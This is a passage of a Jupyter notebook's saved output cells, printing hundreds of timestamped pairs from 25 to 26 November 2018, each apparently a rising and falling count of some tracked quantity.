"['2018-11-25 10:48:30.508976', 3]\n",
"['2018-11-25 10:48:30.903010', 4]\n",
"['2018-11-25 10:48:38.386436', 5]\n",
"['2018-11-25 10:48:58.671973', 6]\n",
"['2018-11-25 10:49:25.694846', 7]\n",
"['2018-11-25 10:49:32.033282', 8]\n",
"['2018-11-25 10:50:30.940314', 9]\n",
"['2018-11-25 10:53:02.744111', 10]\n",
"['2018-11-25 10:55:45.999134', 4]\n",
"['2018-11-25 10:58:55.732432', 5]\n",
"['2018-11-25 11:34:35.235237', 2]\n",
"['2018-11-25 11:44:33.334359', 3]\n",
"['2018-11-25 11:50:27.234236', 4]\n",
"['2018-11-25 11:50:37.999478', 3]\n",
"['2018-11-25 11:51:15.285628', 4]\n",
"['2018-11-25 11:51:48.165670', 5]\n",
"['2018-11-25 11:51:50.868033', 6]\n",
"['2018-11-25 11:53:41.319448', 7]\n",
"['2018-11-25 11:55:05.138127', 8]\n",
"['2018-11-25 11:58:32.597283', 3]\n",
"['2018-11-25 11:58:34.251223', 4]\n",
"['2018-11-25 11:59:21.675811', 3]\n",
"['2018-11-25 12:02:01.304959', 4]\n",
"['2018-11-25 12:06:10.767524', 2]\n",
"['2018-11-25 12:07:48.172917', 3]\n",
"['2018-11-25 12:17:50.314915', 2]\n",
"['2018-11-25 12:36:10.633480', 3]\n",
"['2018-11-25 12:44:42.920444', 4]\n",
"['2018-11-25 12:46:12.297800', 5]\n",
"['2018-11-25 12:46:16.600861', 6]\n",
"['2018-11-25 12:46:25.580643', 7]\n",
"['2018-11-25 12:46:36.988088', 8]\n",
"['2018-11-25 12:46:43.853998', 9]\n",
"['2018-11-25 12:47:02.757530', 10]\n",
"['2018-11-25 12:48:27.758868', 11]\n",
"['2018-11-25 12:49:26.432658', 12]\n",
"['2018-11-25 12:50:54.480788', 11]\n",
"['2018-11-25 12:51:54.311211', 12]\n",
"['2018-11-25 12:51:58.885119', 13]\n",
"['2018-11-25 12:52:06.507224', 14]\n",
"['2018-11-25 12:52:23.194904', 15]\n",
"['2018-11-25 12:52:28.520488', 14]\n",
"['2018-11-25 12:52:54.816462', 15]\n",
"['2018-11-25 12:53:19.461680', 14]\n",
"['2018-11-25 12:53:28.923527', 12]\n",
"['2018-11-25 12:53:50.107341', 11]\n",
"['2018-11-25 12:54:00.283162', 12]\n",
"['2018-11-25 12:54:04.103582', 11]\n",
"['2018-11-25 12:54:19.078466', 10]\n",
"['2018-11-25 12:55:27.823958', 11]\n",
"['2018-11-25 12:55:39.844661', 12]\n",
"['2018-11-25 12:55:58.910504', 11]\n",
"['2018-11-25 12:56:05.207767', 12]\n",
"['2018-11-25 12:56:26.519521', 11]\n",
"['2018-11-25 12:57:34.863074', 12]\n",
"['2018-11-25 12:58:14.002832', 11]\n",
"['2018-11-25 12:59:30.334402', 9]\n",
"['2018-11-25 12:59:36.343569', 8]\n",
"['2018-11-25 12:59:41.001154', 9]\n",
"['2018-11-25 13:00:09.696076', 8]\n",
"['2018-11-25 13:01:17.289526', 9]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 13:03:15.964789', 7]\n",
"['2018-11-25 13:04:13.394999', 3]\n",
"['2018-11-25 13:06:39.631738', 4]\n",
"['2018-11-25 13:11:07.074468', 3]\n",
"['2018-11-25 13:18:43.247270', 2]\n",
"['2018-11-25 13:31:59.601377', 3]\n",
"['2018-11-25 13:40:13.734501', 2]\n",
"['2018-11-25 13:40:24.220923', 3]\n",
"['2018-11-25 13:41:18.836631', 4]\n",
"['2018-11-25 13:43:32.368381', 5]\n",
"['2018-11-25 13:45:11.797263', 6]\n",
"['2018-11-25 13:46:03.374674', 7]\n",
"['2018-11-25 13:47:37.432631', 6]\n",
"['2018-11-25 13:48:38.925202', 5]\n",
"['2018-11-25 13:52:03.961160', 6]\n",
"['2018-11-25 13:54:38.019377', 5]\n",
"['2018-11-25 13:54:54.133969', 6]\n",
"['2018-11-25 13:58:11.731808', 5]\n",
"['2018-11-25 13:59:03.978864', 4]\n",
"['2018-11-25 13:59:06.492618', 5]\n",
"['2018-11-25 13:59:39.811620', 6]\n",
"['2018-11-25 13:59:40.872786', 7]\n",
"['2018-11-25 14:00:39.663305', 8]\n",
"['2018-11-25 14:00:57.691597', 9]\n",
"['2018-11-25 14:01:12.051750', 10]\n",
"['2018-11-25 14:03:49.586733', 7]\n",
"['2018-11-25 14:05:11.383864', 6]\n",
"['2018-11-25 14:10:34.939162', 2]\n",
"['2018-11-25 14:38:51.295590', 3]\n",
"['2018-11-25 14:39:20.264402', 4]\n",
"['2018-11-25 14:40:22.936849', 5]\n",
"['2018-11-25 14:41:25.862150', 6]\n",
"['2018-11-25 14:42:05.265082', 7]\n",
"['2018-11-25 14:43:45.572633', 8]\n",
"['2018-11-25 14:44:47.337488', 9]\n",
"['2018-11-25 14:45:18.914702', 10]\n",
"['2018-11-25 14:45:24.876593', 11]\n",
"['2018-11-25 14:45:40.097370', 12]\n",
"['2018-11-25 14:46:23.816567', 13]\n",
"['2018-11-25 14:46:26.394133', 14]\n",
"['2018-11-25 14:47:26.408625', 15]\n",
"['2018-11-25 14:47:38.614264', 14]\n",
"['2018-11-25 14:47:48.770509', 13]\n",
"['2018-11-25 14:48:07.861145', 14]\n",
"['2018-11-25 14:49:17.522679', 13]\n",
"['2018-11-25 14:49:39.040543', 12]\n",
"['2018-11-25 14:50:14.813459', 10]\n",
"['2018-11-25 14:50:21.045884', 9]\n",
"['2018-11-25 14:50:38.460062', 7]\n",
"['2018-11-25 14:50:46.693097', 8]\n",
"['2018-11-25 14:51:02.749436', 7]\n",
"['2018-11-25 14:51:27.941949', 8]\n",
"['2018-11-25 14:52:53.064802', 7]\n",
"['2018-11-25 14:52:57.619145', 8]\n",
"['2018-11-25 14:53:30.134411', 9]\n",
"['2018-11-25 14:53:49.670555', 8]\n",
"['2018-11-25 14:54:05.341721', 9]\n",
"['2018-11-25 14:55:10.018105', 8]\n",
"['2018-11-25 14:55:51.487218', 7]\n",
"['2018-11-25 14:58:38.621091', 5]\n",
"['2018-11-25 14:59:22.203304', 3]\n",
"['2018-11-25 15:02:26.369485', 4]\n",
"['2018-11-25 15:35:34.427048', 2]\n",
"['2018-11-25 15:39:36.562398', 3]\n",
"['2018-11-25 15:44:23.200088', 2]\n",
"['2018-11-25 15:48:05.404327', 3]\n",
"['2018-11-25 15:49:22.293270', 4]\n",
"['2018-11-25 15:50:09.268664', 5]\n",
"['2018-11-25 15:51:31.004868', 6]\n",
"['2018-11-25 15:51:57.390691', 7]\n",
"['2018-11-25 15:52:18.145631', 6]\n",
"['2018-11-25 15:53:36.996697', 7]\n",
"['2018-11-25 15:53:55.428695', 8]\n",
"['2018-11-25 15:54:09.891769', 9]\n",
"['2018-11-25 15:54:23.535938', 10]\n",
"['2018-11-25 15:54:27.163672', 11]\n",
"['2018-11-25 15:56:03.080487', 10]\n",
"['2018-11-25 15:56:48.064757', 9]\n",
"['2018-11-25 15:56:49.052400', 10]\n",
"['2018-11-25 15:56:49.800971', 11]\n",
"['2018-11-25 15:56:51.540519', 12]\n",
"['2018-11-25 15:57:51.386687', 13]\n",
"['2018-11-25 15:58:22.988858', 12]\n",
"['2018-11-25 15:59:23.722766', 10]\n",
"['2018-11-25 15:59:59.735823', 11]\n",
"['2018-11-25 16:00:14.736055', 10]\n",
"['2018-11-25 16:00:31.196425', 11]\n",
"['2018-11-25 16:01:00.591552', 9]\n",
"['2018-11-25 16:01:54.626553', 6]\n",
"['2018-11-25 16:03:31.566057', 5]\n",
"['2018-11-25 16:04:31.739478', 4]\n",
"['2018-11-25 16:05:39.464132', 2]\n",
"['2018-11-25 16:45:14.198520', 3]\n",
"['2018-11-25 16:45:47.791079', 4]\n",
"['2018-11-25 16:46:00.198124', 5]\n",
"['2018-11-25 16:46:50.873788', 6]\n",
"['2018-11-25 16:47:27.039932', 7]\n",
"['2018-11-25 16:48:33.576555', 6]\n",
"['2018-11-25 16:50:24.486878', 7]\n",
"['2018-11-25 16:50:30.770456', 8]\n",
"['2018-11-25 16:51:04.139431', 7]\n",
"['2018-11-25 16:51:42.854057', 5]\n",
"['2018-11-25 16:51:53.461958', 6]\n",
"['2018-11-25 16:52:15.617686', 7]\n",
"['2018-11-25 16:53:03.851368', 8]\n",
"['2018-11-25 16:54:23.542455', 9]\n",
"['2018-11-25 16:55:05.480918', 10]\n",
"['2018-11-25 16:55:12.638209', 9]\n",
"['2018-11-25 16:56:27.724922', 6]\n",
"['2018-11-25 16:58:36.271154', 4]\n",
"['2018-11-25 17:00:44.216355', 2]\n",
"['2018-11-25 17:04:15.535459', 3]\n",
"['2018-11-25 17:17:17.190481', 2]\n",
"['2018-11-25 17:20:14.077408', 3]\n",
"['2018-11-25 17:26:00.765978', 4]\n",
"['2018-11-25 17:28:33.921652', 3]\n",
"['2018-11-25 17:30:11.273696', 4]\n",
"['2018-11-25 17:36:16.550833', 5]\n",
"['2018-11-25 17:38:18.882768', 6]\n",
"['2018-11-25 17:38:41.998947', 7]\n",
"['2018-11-25 17:40:00.121230', 8]\n",
"['2018-11-25 17:42:17.720381', 7]\n",
"['2018-11-25 17:42:25.731189', 6]\n",
"['2018-11-25 17:43:43.840789', 5]\n",
"['2018-11-25 17:47:53.180339', 6]\n",
"['2018-11-25 17:50:19.909624', 7]\n",
"['2018-11-25 17:50:38.867995', 8]\n",
"['2018-11-25 17:51:03.685097', 9]\n",
"['2018-11-25 17:51:24.995883', 10]\n",
"['2018-11-25 17:51:26.358448', 11]\n",
"['2018-11-25 17:51:28.796752', 12]\n",
"['2018-11-25 17:51:35.370944', 13]\n",
"['2018-11-25 17:51:50.102982', 12]\n",
"['2018-11-25 17:52:01.450040', 13]\n",
"['2018-11-25 17:52:02.073178', 14]\n",
"['2018-11-25 17:52:16.080762', 13]\n",
"['2018-11-25 17:53:59.689090', 12]\n",
"['2018-11-25 17:53:59.957100', 13]\n",
"['2018-11-25 17:54:18.023564', 14]\n",
"['2018-11-25 17:54:49.586596', 15]\n",
"['2018-11-25 17:55:28.783605', 16]\n",
"['2018-11-25 17:55:48.527028', 17]\n",
"['2018-11-25 17:55:49.488911', 18]\n",
"['2018-11-25 17:56:22.516706', 17]\n",
"['2018-11-25 17:56:54.492708', 16]\n",
"['2018-11-25 17:58:21.200791', 15]\n",
"['2018-11-25 17:58:29.040856', 16]\n",
"['2018-11-25 17:58:33.402268', 17]\n",
"['2018-11-25 17:59:18.616100', 16]\n",
"['2018-11-25 17:59:19.811840', 17]\n",
"['2018-11-25 17:59:30.707491', 15]\n",
"['2018-11-25 17:59:38.250280', 16]\n",
"['2018-11-25 17:59:43.779494', 17]\n",
"['2018-11-25 17:59:56.267300', 15]\n",
"['2018-11-25 18:00:13.794133', 14]\n",
"['2018-11-25 18:00:46.496098', 13]\n",
"['2018-11-25 18:00:50.873461', 14]\n",
"['2018-11-25 18:01:27.936744', 15]\n",
"['2018-11-25 18:02:19.857573', 16]\n",
"['2018-11-25 18:02:29.860509', 15]\n",
"['2018-11-25 18:02:34.857575', 14]\n",
"['2018-11-25 18:03:21.771338', 13]\n",
"['2018-11-25 18:03:51.930278', 11]\n",
"['2018-11-25 18:04:13.242147', 10]\n",
"['2018-11-25 18:04:21.992600', 9]\n",
"['2018-11-25 18:05:00.636407', 8]\n",
"['2018-11-25 18:05:32.999389', 7]\n",
"['2018-11-25 18:07:00.779187', 6]\n",
"['2018-11-25 18:08:05.397180', 7]\n",
"['2018-11-25 18:08:34.146984', 6]\n",
"['2018-11-25 18:10:11.364978', 5]\n",
"['2018-11-25 18:10:35.324664', 4]\n",
"['2018-11-25 18:19:20.427080', 2]\n",
"['2018-11-25 18:31:13.182407', 3]\n",
"['2018-11-25 18:32:19.729625', 4]\n",
"['2018-11-25 18:34:21.522573', 3]\n",
"['2018-11-25 18:35:22.626915', 2]\n",
"['2018-11-25 18:35:33.669287', 3]\n",
"['2018-11-25 18:38:32.280582', 4]\n",
"['2018-11-25 18:40:34.268806', 3]\n",
"['2018-11-25 18:42:45.238881', 4]\n",
"['2018-11-25 18:42:54.063597', 5]\n",
"['2018-11-25 18:43:10.844880', 6]\n",
"['2018-11-25 18:43:52.707384', 7]\n",
"['2018-11-25 18:44:24.162965', 8]\n",
"['2018-11-25 18:46:25.893745', 7]\n",
"['2018-11-25 18:47:40.365660', 8]\n",
"['2018-11-25 18:47:53.444204', 9]\n",
"['2018-11-25 18:48:02.711612', 10]\n",
"['2018-11-25 18:48:17.290853', 11]\n",
"['2018-11-25 18:48:25.842640', 10]\n",
"['2018-11-25 18:48:44.507481', 9]\n",
"['2018-11-25 18:48:52.717379', 10]\n",
"['2018-11-25 18:49:15.448403', 9]\n",
"['2018-11-25 18:49:35.196925', 10]\n",
"['2018-11-25 18:51:04.262672', 9]\n",
"['2018-11-25 18:51:07.690343', 10]\n",
"['2018-11-25 18:51:31.737028', 11]\n",
"['2018-11-25 18:52:03.288977', 10]\n",
"['2018-11-25 18:52:19.138538', 9]\n",
"['2018-11-25 18:52:35.060072', 8]\n",
"['2018-11-25 18:52:50.888321', 7]\n",
"['2018-11-25 18:52:53.126070', 8]\n",
"['2018-11-25 18:53:00.961090', 9]\n",
"['2018-11-25 18:53:17.751994', 8]\n",
"['2018-11-25 18:54:33.002052', 7]\n",
"['2018-11-25 18:55:51.955865', 6]\n",
"['2018-11-25 18:56:19.717544', 5]\n",
"['2018-11-25 18:56:59.387487', 4]\n",
"['2018-11-25 18:57:15.153598', 3]\n",
"['2018-11-25 18:59:37.005272', 2]\n",
"['2018-11-25 19:01:07.961527', 3]\n",
"['2018-11-25 19:05:21.420094', 2]\n",
"['2018-11-25 19:39:29.303132', 3]\n",
"['2018-11-25 19:42:53.003458', 4]\n",
"['2018-11-25 19:43:49.361230', 3]\n",
"['2018-11-25 19:49:00.397936', 2]\n",
"['2018-11-25 19:49:02.863583', 3]\n",
"['2018-11-25 19:50:05.679368', 4]\n",
"['2018-11-25 19:51:27.149903', 5]\n",
"['2018-11-25 19:51:29.414310', 6]\n",
"['2018-11-25 19:52:41.924532', 7]\n",
"['2018-11-25 19:52:58.632928', 8]\n",
"['2018-11-25 19:53:26.003327', 9]\n",
"['2018-11-25 19:53:41.354538', 8]\n",
"['2018-11-25 19:54:31.480483', 7]\n",
"['2018-11-25 19:55:13.029677', 8]\n",
"['2018-11-25 19:55:40.174924', 6]\n",
"['2018-11-25 19:56:21.960236', 7]\n",
"['2018-11-25 19:56:53.385371', 8]\n",
"['2018-11-25 19:57:19.223098', 7]\n",
"['2018-11-25 19:57:27.075870', 8]\n",
"['2018-11-25 19:58:16.800934', 9]\n",
"['2018-11-25 19:58:50.008537', 10]\n",
"['2018-11-25 19:59:34.058258', 11]\n",
"['2018-11-25 20:00:09.493370', 12]\n",
"['2018-11-25 20:00:10.888474', 13]\n",
"['2018-11-25 20:01:10.888520', 10]\n",
"['2018-11-25 20:01:47.339750', 9]\n",
"['2018-11-25 20:02:05.141672', 8]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 20:03:42.829027', 7]\n",
"['2018-11-25 20:04:01.770491', 8]\n",
"['2018-11-25 20:05:22.839742', 6]\n",
"['2018-11-25 20:06:02.803354', 5]\n",
"['2018-11-25 20:08:25.871751', 3]\n",
"['2018-11-25 20:09:18.034806', 4]\n",
"['2018-11-25 20:12:13.276265', 3]\n",
"['2018-11-25 20:37:28.559666', 2]\n",
"['2018-11-25 20:37:42.749358', 3]\n",
"['2018-11-25 20:42:45.048446', 2]\n",
"['2018-11-25 20:44:32.980717', 3]\n",
"['2018-11-25 20:48:04.447586', 4]\n",
"['2018-11-25 20:51:49.622578', 5]\n",
"['2018-11-25 20:52:27.953632', 4]\n",
"['2018-11-25 20:53:05.751835', 5]\n",
"['2018-11-25 21:00:58.769214', 2]\n",
"['2018-11-25 21:32:37.535269', 3]\n",
"['2018-11-25 21:46:49.508322', 2]\n",
"['2018-11-25 21:51:39.435945', 3]\n",
"['2018-11-25 21:51:45.452736', 2]\n",
"['2018-11-25 21:53:27.541489', 3]\n",
"['2018-11-25 21:53:52.426385', 4]\n",
"['2018-11-25 21:54:07.655820', 5]\n",
"['2018-11-25 21:54:34.542388', 6]\n",
"['2018-11-25 21:55:17.620493', 7]\n",
"['2018-11-25 21:55:28.057876', 8]\n",
"['2018-11-25 21:57:25.715539', 9]\n",
"['2018-11-25 22:02:23.037508', 2]\n",
"['2018-11-25 22:02:25.777150', 3]\n",
"['2018-11-26 04:39:38.760464', 2]\n",
"['2018-11-26 04:44:54.314861', 3]\n",
"['2018-11-26 04:53:26.893312', 2]\n",
"['2018-11-26 06:00:46.746105', 3]\n",
"['2018-11-26 06:02:11.982158', 4]\n",
"['2018-11-26 06:02:25.012466', 5]\n",
"['2018-11-26 06:02:31.531218', 6]\n",
"['2018-11-26 06:02:40.240092', 7]\n",
"['2018-11-26 06:02:45.748156', 8]\n",
"['2018-11-26 06:03:09.965732', 9]\n",
"['2018-11-26 06:03:36.478135', 8]\n",
"['2018-11-26 06:05:12.675850', 9]\n",
"['2018-11-26 06:06:03.368651', 10]\n",
"['2018-11-26 06:07:07.885174', 9]\n",
"['2018-11-26 06:07:12.673975', 8]\n",
"['2018-11-26 06:08:18.308201', 6]\n",
"['2018-11-26 06:09:59.127051', 5]\n",
"['2018-11-26 06:11:08.429949', 4]\n",
"['2018-11-26 06:13:36.977048', 5]\n",
"['2018-11-26 06:14:07.604014', 6]\n",
"['2018-11-26 06:14:14.892747', 7]\n",
"['2018-11-26 06:14:20.320342', 8]\n",
"['2018-11-26 06:14:35.539013', 7]\n",
"['2018-11-26 06:15:15.276443', 8]\n",
"['2018-11-26 06:19:26.019050', 9]\n",
"['2018-11-26 06:20:35.346708', 10]\n",
"['2018-11-26 06:21:31.855935', 9]\n",
"['2018-11-26 06:22:32.297884', 8]\n",
"['2018-11-26 06:24:28.073424', 9]\n",
"['2018-11-26 06:24:59.978858', 8]\n",
"['2018-11-26 06:25:59.454231', 7]\n",
"['2018-11-26 06:26:03.231181', 8]\n",
"['2018-11-26 06:26:33.722984', 7]\n",
"['2018-11-26 06:33:23.522950', 6]\n",
"['2018-11-26 06:34:03.366762', 4]\n",
"['2018-11-26 06:34:35.231045', 5]\n",
"['2018-11-26 06:36:04.638604', 4]\n",
"['2018-11-26 06:41:38.049794', 3]\n",
"['2018-11-26 06:47:28.623304', 4]\n",
"['2018-11-26 06:48:01.696650', 3]\n",
"['2018-11-26 06:48:19.154189', 4]\n",
"['2018-11-26 06:50:03.266911', 5]\n",
"['2018-11-26 06:50:12.226762', 6]\n",
"['2018-11-26 06:50:45.000306', 5]\n",
"['2018-11-26 06:52:21.019052', 4]\n",
"['2018-11-26 06:53:53.371239', 3]\n",
"['2018-11-26 07:02:58.774629', 4]\n",
"['2018-11-26 07:03:38.608696', 5]\n",
"['2018-11-26 07:07:06.369898', 4]\n",
"['2018-11-26 07:07:15.544688', 5]\n",
"['2018-11-26 07:07:58.777784', 4]\n",
"['2018-11-26 07:08:56.072159', 5]\n",
"['2018-11-26 07:10:09.896416', 6]\n",
"['2018-11-26 07:11:38.066414', 7]\n",
"['2018-11-26 07:13:00.805320', 6]\n",
"['2018-11-26 07:13:33.037347', 7]\n",
"['2018-11-26 07:13:43.576406', 8]\n",
"['2018-11-26 07:13:55.046185', 9]\n",
"['2018-11-26 07:13:58.358798', 10]\n",
"['2018-11-26 07:14:23.230631', 11]\n",
"['2018-11-26 07:14:30.240485', 10]\n",
"['2018-11-26 07:14:48.638431', 11]\n",
"['2018-11-26 07:15:02.170355', 12]\n",
"['2018-11-26 07:15:04.021272', 13]\n",
"['2018-11-26 07:15:48.640962', 12]\n",
"['2018-11-26 07:15:53.012808', 13]\n",
"['2018-11-26 07:17:37.728360', 14]\n",
"['2018-11-26 07:18:07.998080', 13]\n",
"['2018-11-26 07:18:24.299502', 12]\n",
"['2018-11-26 07:18:25.292598', 11]\n",
"['2018-11-26 07:19:22.694937', 12]\n",
"['2018-11-26 07:19:59.746074', 11]\n",
"['2018-11-26 07:20:12.620103', 12]\n",
"['2018-11-26 07:20:18.038272', 13]\n",
"['2018-11-26 07:20:45.847229', 14]\n",
"['2018-11-26 07:21:31.255934', 13]\n",
"['2018-11-26 07:21:52.832093', 12]\n",
"['2018-11-26 07:22:00.883210', 13]\n",
"['2018-11-26 07:22:24.960937', 14]\n",
"['2018-11-26 07:22:48.236040', 15]\n",
"['2018-11-26 07:23:16.336176', 14]\n",
"['2018-11-26 07:24:18.098725', 10]\n",
"['2018-11-26 07:24:20.819982', 11]\n",
"['2018-11-26 07:29:55.824071', 2]\n",
"['2018-11-26 07:30:06.807682', 3]\n",
"['2018-11-26 07:36:20.125522', 2]\n",
"['2018-11-26 07:37:21.310988', 3]\n",
"['2018-11-26 07:38:16.327422', 4]\n",
"['2018-11-26 07:41:56.727716', 3]\n",
"['2018-11-26 07:45:14.082943', 2]\n",
"['2018-11-26 07:46:52.243453', 3]\n",
"['2018-11-26 07:53:25.094321', 2]\n",
"['2018-11-26 07:54:37.786057', 3]\n",
"['2018-11-26 07:57:36.082330', 4]\n",
"['2018-11-26 07:57:45.474334', 5]\n",
"['2018-11-26 07:58:57.281097', 6]\n",
"['2018-11-26 08:00:53.674815', 7]\n",
"['2018-11-26 08:00:59.457419', 8]\n",
"['2018-11-26 08:01:27.290793', 7]\n",
"['2018-11-26 08:01:44.443057', 8]\n",
"['2018-11-26 08:01:57.924106', 9]\n",
"['2018-11-26 08:02:09.835822', 10]\n",
"['2018-11-26 08:02:37.149247', 11]\n",
"['2018-11-26 08:04:39.407521', 10]\n",
"['2018-11-26 08:04:59.846589', 9]\n",
"['2018-11-26 08:06:15.789280', 10]\n",
"['2018-11-26 08:06:36.665894', 11]\n",
"['2018-11-26 08:06:53.241822', 12]\n",
"['2018-11-26 08:07:08.676041', 13]\n",
"['2018-11-26 08:07:10.083279', 14]\n",
"['2018-11-26 08:07:23.241511', 15]\n",
"['2018-11-26 08:07:33.797834', 14]\n",
"['2018-11-26 08:08:02.045286', 15]\n",
"['2018-11-26 08:08:25.658470', 14]\n",
"['2018-11-26 08:09:37.293943', 13]\n",
"['2018-11-26 08:10:17.179392', 14]\n",
"['2018-11-26 08:11:00.424073', 15]\n",
"['2018-11-26 08:11:54.994246', 16]\n",
"['2018-11-26 08:12:03.829994', 15]\n",
"['2018-11-26 08:12:29.073487', 14]\n",
"['2018-11-26 08:12:38.213371', 15]\n",
"['2018-11-26 08:13:01.479250', 14]\n",
"['2018-11-26 08:13:18.295327', 15]\n",
"['2018-11-26 08:13:35.174228', 16]\n",
"['2018-11-26 08:13:40.260225', 17]\n",
"['2018-11-26 08:13:42.729627', 18]\n",
"['2018-11-26 08:13:53.584418', 19]\n",
"['2018-11-26 08:14:54.493781', 20]\n",
"['2018-11-26 08:15:06.860879', 19]\n",
"['2018-11-26 08:15:46.543578', 18]\n",
"['2018-11-26 08:15:57.257576', 19]\n",
"['2018-11-26 08:16:34.614831', 20]\n",
"['2018-11-26 08:16:43.063457', 19]\n",
"['2018-11-26 08:16:50.248598', 20]\n",
"['2018-11-26 08:17:36.720997', 19]\n",
"['2018-11-26 08:17:37.231991', 20]\n",
"['2018-11-26 08:17:45.962913', 18]\n",
"['2018-11-26 08:17:55.071799', 17]\n",
"['2018-11-26 08:18:30.753428', 18]\n",
"['2018-11-26 08:19:03.766102', 19]\n",
"['2018-11-26 08:19:25.435226', 20]\n",
"['2018-11-26 08:19:41.555696', 19]\n",
"['2018-11-26 08:19:47.242095', 18]\n",
"['2018-11-26 08:20:01.246655', 17]\n",
"['2018-11-26 08:20:08.096207', 18]\n",
"['2018-11-26 08:20:13.770895', 17]\n",
"['2018-11-26 08:20:15.996072', 18]\n",
"['2018-11-26 08:20:30.874089', 17]\n",
"['2018-11-26 08:20:38.226923', 16]\n",
"['2018-11-26 08:20:57.097259', 15]\n",
"['2018-11-26 08:21:11.327607', 16]\n",
"['2018-11-26 08:21:55.682492', 15]\n",
"['2018-11-26 08:22:04.349608', 16]\n",
"['2018-11-26 08:22:22.988032', 17]\n",
"['2018-11-26 08:22:35.721831', 18]\n",
"['2018-11-26 08:22:53.197568', 19]\n",
"['2018-11-26 08:22:53.849244', 20]\n",
"['2018-11-26 08:23:03.856845', 19]\n",
"['2018-11-26 08:23:46.624660', 18]\n",
"['2018-11-26 08:23:56.670420', 17]\n",
"['2018-11-26 08:24:50.568524', 16]\n",
"['2018-11-26 08:25:22.566063', 15]\n",
"['2018-11-26 08:25:24.121239', 14]\n",
"['2018-11-26 08:26:17.259783', 11]\n",
"['2018-11-26 08:26:57.472266', 10]\n",
"['2018-11-26 08:27:27.150947', 9]\n",
"['2018-11-26 08:27:47.476377', 7]\n",
"['2018-11-26 08:28:49.601785', 5]\n",
"['2018-11-26 08:29:53.045186', 6]\n",
"['2018-11-26 08:30:14.786414', 7]\n",
"['2018-11-26 08:30:21.512221', 8]\n",
"['2018-11-26 08:30:29.023756', 9]\n",
"['2018-11-26 08:31:26.084473', 10]\n",
"['2018-11-26 08:32:49.983768', 11]\n",
"['2018-11-26 08:32:52.290193', 12]\n",
"['2018-11-26 08:33:13.981987', 13]\n",
"['2018-11-26 08:33:46.909965', 14]\n",
"['2018-11-26 08:33:49.905587', 15]\n",
"['2018-11-26 08:35:38.223049', 16]\n",
"['2018-11-26 08:36:30.361062', 15]\n",
"['2018-11-26 08:37:33.623818', 14]\n",
"['2018-11-26 08:37:33.920039', 15]\n",
"['2018-11-26 08:37:36.351529', 16]\n",
"['2018-11-26 08:39:40.259943', 15]\n",
"['2018-11-26 08:40:12.843236', 14]\n",
"['2018-11-26 08:41:53.116627', 13]\n",
"['2018-11-26 08:42:14.089621', 11]\n",
"['2018-11-26 08:42:32.804288', 10]\n",
"['2018-11-26 08:43:43.883951', 9]\n",
"['2018-11-26 08:43:51.392966', 8]\n",
"['2018-11-26 08:43:51.929101', 9]\n",
"['2018-11-26 08:44:19.904060', 8]\n",
"['2018-11-26 08:45:02.666979', 9]\n",
"['2018-11-26 08:46:17.380334', 8]\n",
"['2018-11-26 08:46:38.436497', 7]\n",
"['2018-11-26 08:47:54.986199', 6]\n",
"['2018-11-26 08:49:48.768178', 5]\n",
"['2018-11-26 08:49:53.946609', 4]\n",
"['2018-11-26 08:50:19.224432', 3]\n",
"['2018-11-26 08:52:11.647017', 4]\n",
"['2018-11-26 08:53:49.577001', 5]\n",
"['2018-11-26 08:54:16.331216', 6]\n",
"['2018-11-26 08:54:33.125113', 7]\n",
"['2018-11-26 08:55:14.742635', 8]\n",
"['2018-11-26 08:55:47.976325', 9]\n",
"['2018-11-26 08:56:13.111818', 8]\n",
"['2018-11-26 08:56:37.397471', 7]\n",
"['2018-11-26 08:57:07.476067', 6]\n",
"['2018-11-26 08:58:13.289102', 5]\n",
"['2018-11-26 08:58:42.179699', 4]\n",
"['2018-11-26 08:59:15.189071', 5]\n",
"['2018-11-26 09:01:47.199572', 4]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 09:02:34.640235', 5]\n",
"['2018-11-26 09:03:12.214788', 6]\n",
"['2018-11-26 09:03:52.104248', 7]\n",
"['2018-11-26 09:04:29.841486', 8]\n",
"['2018-11-26 09:04:52.487559', 9]\n",
"['2018-11-26 09:05:47.930141', 8]\n",
"['2018-11-26 09:06:34.776245', 7]\n",
"['2018-11-26 09:07:28.477279', 5]\n",
"['2018-11-26 09:08:23.583190', 4]\n",
"['2018-11-26 09:13:39.492418', 3]\n",
"['2018-11-26 09:14:15.816849', 4]\n",
"['2018-11-26 09:14:55.602263', 5]\n",
"['2018-11-26 09:22:00.704490', 4]\n",
"['2018-11-26 09:22:04.648529', 5]\n",
"['2018-11-26 09:22:43.060755', 6]\n",
"['2018-11-26 09:23:02.909153', 7]\n",
"['2018-11-26 09:23:48.766869', 6]\n",
"['2018-11-26 09:24:00.563381', 7]\n",
"['2018-11-26 09:24:22.386807', 8]\n",
"['2018-11-26 09:24:53.144594', 9]\n",
"['2018-11-26 09:25:34.827567', 10]\n",
"['2018-11-26 09:25:48.728030', 11]\n",
"['2018-11-26 09:25:56.552111', 12]\n",
"['2018-11-26 09:26:02.059028', 13]\n",
"['2018-11-26 09:26:43.258575', 12]\n",
"['2018-11-26 09:27:21.996004', 13]\n",
"['2018-11-26 09:27:43.205786', 12]\n",
"['2018-11-26 09:29:06.452117', 9]\n",
"['2018-11-26 09:29:10.188595', 10]\n",
"['2018-11-26 09:29:11.054440', 11]\n",
"['2018-11-26 09:29:17.955729', 12]\n",
"['2018-11-26 09:29:44.402329', 11]\n",
"['2018-11-26 09:29:57.299165', 12]\n",
"['2018-11-26 09:30:07.575501', 13]\n",
"['2018-11-26 09:30:20.667222', 14]\n",
"['2018-11-26 09:30:30.468270', 15]\n",
"['2018-11-26 09:30:53.691270', 14]\n",
"['2018-11-26 09:30:59.700146', 12]\n",
"['2018-11-26 09:31:39.642027', 11]\n",
"['2018-11-26 09:31:53.567016', 10]\n",
"['2018-11-26 09:31:58.252740', 11]\n",
"['2018-11-26 09:33:21.663147', 9]\n",
"['2018-11-26 09:34:02.734887', 8]\n",
"['2018-11-26 09:34:14.012337', 7]\n",
"['2018-11-26 09:35:35.585854', 6]\n",
"['2018-11-26 09:36:11.916182', 5]\n",
"['2018-11-26 09:36:39.441418', 6]\n",
"['2018-11-26 09:39:18.648540', 5]\n",
"['2018-11-26 09:40:36.798086', 6]\n",
"['2018-11-26 09:43:36.600332', 5]\n",
"['2018-11-26 09:45:40.645252', 3]\n",
"['2018-11-26 09:56:51.525056', 2]\n",
"['2018-11-26 10:04:46.496269', 3]\n",
"['2018-11-26 10:12:44.143579', 2]\n",
